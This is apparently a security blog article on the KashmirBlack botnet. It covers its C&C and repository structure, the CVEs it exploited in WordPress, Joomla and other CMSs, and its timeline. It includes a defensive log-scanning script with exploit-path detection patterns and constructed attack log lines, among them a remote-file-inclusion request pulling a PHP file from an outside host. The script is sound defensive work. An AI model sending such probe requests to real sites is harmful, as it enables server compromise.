KashmirBlack Botnet Attacked Popular CMSs Like WordPress & Joomla
KashmirBlack Botnet Mainly Infects Sites Running on CMSs Such As WordPress
Websites are attacked every day through credential brute forcing, exploitation of known vulnerabilities and other means, and the attacks vary widely in type, scope and volume. One of the larger operations of this kind is a sophisticated botnet called KashmirBlack, which has infected hundreds of thousands of websites by attacking popular CMS (Content Management System) platforms such as WordPress, Joomla and Drupal.
What’s KashmirBlack Botnet?
A botnet is a collection of internet-connected devices infected with malware that lets an attacker control them remotely. KashmirBlack is one such botnet. It mainly targets popular CMS platforms such as WordPress, compromises victims' servers through a set of known vulnerabilities, and performs millions of attacks per day against targets in more than 30 countries.
The botnet's main purposes are to use the infected servers for cryptocurrency mining and to redirect legitimate site traffic to spam pages.
According to Imperva researchers, the botnet started small, but after a few months of steady growth it turned into a sophisticated operation capable of attacking thousands of sites in a single day. In May 2020 a further significant change took place: KashmirBlack expanded its command-and-control (C&C) infrastructure and its exploit arsenal.
Before getting into those changes, here is an overview of how the KashmirBlack botnet is put together.
High-Level Description of KashmirBlack Botnet
KashmirBlack is managed by a single command-and-control (C&C) server and uses more than 60 surrogate servers as part of its infrastructure. It handles hundreds of bots, each of which communicates with the C&C to receive new targets, perform brute-force attacks, install backdoors, and expand the size of the botnet.
Further Analysis of KashmirBlack Botnet Entities
The entities that make up the KashmirBlack botnet are described below; together they show what makes this infrastructure more layered than that of a typical botnet.
C&C Server
Put simply, the C&C server is a centralized machine that sends commands to, and receives telemetry from, the machines that are part of the botnet. In KashmirBlack it:
- Supplies the Perl spreading script that infects a victim's server with the malicious botnet script
- Receives reports and attack results from the bots
- Supplies the bots with instructions on what to attack
Repository A
This repository stores the malicious scripts of the botnet that communicate with the C&C.
Repository B
This repository stores the bundles of payloads and exploits.
Spreading Bot
As the name implies, a spreading bot continuously communicates with the C&C and receives instructions on which targets to attack next. Once an attack succeeds, the bot reports the new victim to the C&C, and that victim becomes a 'pending bot'.
Pending Bot
A pending bot is a newly infected server that waits for the C&C to contact it and assign it a purpose within the botnet.
Here’s When KashmirBlack Botnet Started
According to Imperva's research, the KashmirBlack botnet operation started in November 2019, and since then the botnet has successfully abused the following 16 vulnerabilities:
- jQuery File Upload arbitrary file upload – CVE-2018-9206
- PHPUnit remote code execution – CVE-2017-9841
- Joomla! remote file upload vulnerability
- Magento Webforms upload vulnerability
- Magento local file inclusion – CVE-2015-2067
- CMS Plupload arbitrary file upload
- Yeager CMS vulnerability – CVE-2015-7571
- Multiple RCE and file-upload vulnerabilities in plugins across several platforms
- Uploadify RCE vulnerability
- WordPress TimThumb RFI vulnerability – CVE-2011-4106
- vBulletin widget RCE – CVE-2019-16759
- WordPress install.php RCE
- WebDAV file upload vulnerability
- WordPress xmlrpc.php login brute-force attack
- WordPress multiple themes RCE
- WordPress multiple plugins RCE
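Most of the entries above leave a recognisable footprint in an ordinary web server access log: a probe for a well-known vulnerable path, or a burst of POSTs to xmlrpc.php from one address. The script below is an added example written for this page, not code from Imperva or from the botnet, that scans access-log lines for both patterns. The request-path fragments are taken from the public write-ups of the listed CVEs (PHPUnit's eval-stdin.php, jQuery File Upload's server/php endpoint, TimThumb's src= parameter, vBulletin's widget_php route, the wp-admin install page and Uploadify), the brute-force threshold of 20 POSTs is an assumed tuning value, and the log lines are constructed sample data.

```python
import re
from collections import Counter

# Apache/nginx common log format, one request per line.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Request-path fragments associated with exploits in the list above. These come from the
# public CVE write-ups, not from the Imperva report; treat them as assumptions to tune.
PROBE_SIGNATURES = [
    ("CVE-2017-9841 PHPUnit eval-stdin", re.compile(r"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php", re.I)),
    ("CVE-2018-9206 jQuery File Upload", re.compile(r"jquery-file-upload/server/php", re.I)),
    ("CVE-2011-4106 TimThumb RFI", re.compile(r"timthumb\.php\?.*src=https?(%3a|:)", re.I)),
    ("CVE-2019-16759 vBulletin widget RCE", re.compile(r"routestring=ajax/render/widget_php", re.I)),
    ("WordPress install.php probe", re.compile(r"/wp-admin/install\.php", re.I)),
    ("Uploadify upload endpoint", re.compile(r"uploadify\.php", re.I)),
]

# Assumed threshold: this many POSTs to xmlrpc.php from one IP in the scanned window
# is treated as a login brute-force attempt.
XMLRPC_THRESHOLD = 20


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the names of all probe signatures matching one parsed request."""
    target = entry["target"]
    hits = [name for name, rx in PROBE_SIGNATURES if rx.search(target)]
    # WebDAV-style uploads show up as PUT requests; the REST API is the one legitimate
    # PUT user on a stock WordPress, so exclude it.
    if entry["method"] == "PUT" and not target.startswith("/wp-json"):
        hits.append("WebDAV PUT upload attempt")
    return hits


def analyze(lines):
    """Scan log lines. Returns (probes, brute_force) where probes is a list of
    (ip, signature, target) tuples and brute_force maps IP -> xmlrpc.php POST count."""
    probes = []
    xmlrpc_posts = Counter()
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue  # not a request line; skip rather than guess
        for name in classify(e):
            probes.append((e["ip"], name, e["target"]))
        path = e["target"].split("?", 1)[0]
        if e["method"] == "POST" and path.endswith("/xmlrpc.php"):
            xmlrpc_posts[e["ip"]] += 1
    brute_force = {ip: n for ip, n in xmlrpc_posts.items() if n >= XMLRPC_THRESHOLD}
    return probes, brute_force


# Constructed sample log: four probes, one benign request, and 25 xmlrpc.php POSTs from one IP.
SAMPLE_LOG = [
    '203.0.113.9 - - [25/Nov/2019:10:00:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 12',
    '203.0.113.9 - - [25/Nov/2019:10:00:02 +0000] "POST /wp-content/plugins/gallery/jquery-file-upload/server/php/index.php HTTP/1.1" 200 88',
    '203.0.113.10 - - [25/Nov/2019:10:00:03 +0000] "GET /wp-content/themes/twentyten/timthumb.php?src=http://203.0.113.44/x.php HTTP/1.1" 400 0',
    '203.0.113.11 - - [25/Nov/2019:10:00:04 +0000] "PUT /webdav/up.php HTTP/1.1" 201 0',
    '198.51.100.1 - - [25/Nov/2019:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 5120',
] + [
    f'198.51.100.7 - - [25/Nov/2019:10:01:{i:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 370'
    for i in range(25)
]

if __name__ == "__main__":
    probes, brute_force = analyze(SAMPLE_LOG)
    for ip, name, target in probes:
        print(f"probe   {ip:<14} {name}: {target}")
    for ip, n in brute_force.items():
        print(f"brute   {ip:<14} {n} POSTs to xmlrpc.php")
```

Only the request line is visible here, so exploits delivered in a POST body (the vBulletin widget_php route is usually sent that way) will be missed unless the server logs bodies or a WAF sits in front; the path signatures catch the reconnaissance that precedes them. Responses with status 200 or 201 to these probes deserve the most attention, since they suggest the vulnerable component is actually present.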
Several clues found during Imperva's research indicate that the KashmirBlack botnet is the work of a hacker known as Exect1337, a member of the Indonesian hacker crew PhantomGhost.
Evolution Timeline of KashmirBlack Botnet
The evolution timeline of the KashmirBlack botnet, as summarised in the timeline image above:
- November 6, 2019 – The oldest exploit and payload bundle uploaded to 'repository B'
- November 25, 2019 – Oldest indication of KashmirBlack botnet activity
- January 31, 2020 – Additional payload and exploit bundles uploaded to 'repository B'
- March 31, 2020 – Cryptominer payload added to 'repository B'
- May 1, 2020 – Payload bundle added to 'repository B'; defacement exploit found
- May 5, 2020 – Attacker visited the honeypot for the first time
- May 5, 2020 – Fake report containing the honeypot's details sent to the C&C
- May 6, 2020 – Second fake report with the honeypot's details sent to the C&C
- May 8, 2020 – Internal change to the botnet's reporting address
- May 9, 2020 – Attacker visited the honeypot a second time
- May 11, 2020 – Payload bundles and exploits updated
- May 2020 – Hidden KashmirBlack repository found on GitHub
- May 15–17, 2020 – New repositories created for future additions to 'repository B'
- May 21, 2020 – New repositories created for future additions to 'repository A'
- May 24, 2020 – The new 'repository B' entered active use
- May 26, 2020 – KashmirBlack's malicious script updated to address the 'repository A' load balancer
- May 31, 2020 – Research ended
KashmirBlack Used GitHub for Storing Files
The attacker used GitHub as version control for storing files. Among them were crypto miners and several web shells used to control a compromised server, upload files to it, or dump its entire database.
Purpose of KashmirBlack Botnet
Imperva observed that KashmirBlack bots serve one of five purposes:
- Crypto Mining
- Pending Bot